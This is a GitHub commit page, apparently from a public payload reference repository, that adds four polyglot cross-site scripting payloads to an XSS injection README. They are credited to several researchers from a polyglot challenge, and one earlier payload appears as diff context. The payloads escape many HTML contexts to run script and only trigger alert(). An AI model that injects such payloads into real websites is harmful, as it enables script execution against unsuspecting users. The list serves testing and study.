Skip to content

Commit

Permalink
Polyglot XSS from @filedescriptor's Polyglot Challenge
Browse files Browse the repository at this point in the history
  • Loading branch information
swisskyrepo committed Oct 31, 2018
1 parent 4b7fe43 commit 86db6b7
Showing 1 changed file with 16 additions and 0 deletions.
16 changes: 16 additions & 0 deletions XSS injection/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -354,6 +354,22 @@ Polyglot XSS - [@s0md3v](https://twitter.com/s0md3v/status/966175714302144514)
<svg%0Ao%00nload=%09((pro\u006dpt))()//
```
Polyglot XSS - from [@filedescriptor's Polyglot Challenge](http://polyglot.innerht.ml)
```javascript
# by crlf
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>

# by europa
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/-->&lt;svg/onload=/*<html/*/onmouseover=alert()//>
# by EdOverflow
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>-->&lt;svg onload=/*<html/*/onmouseover=alert()//>

# by h1/ragnar
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template>&lt;svg/onload='/*--><html */ onmouseover=alert()//'>`
```

## Filter Bypass and exotic payloads

Bypass case sensitive
Expand Down

0 comments on commit 86db6b7

Please sign in to comment.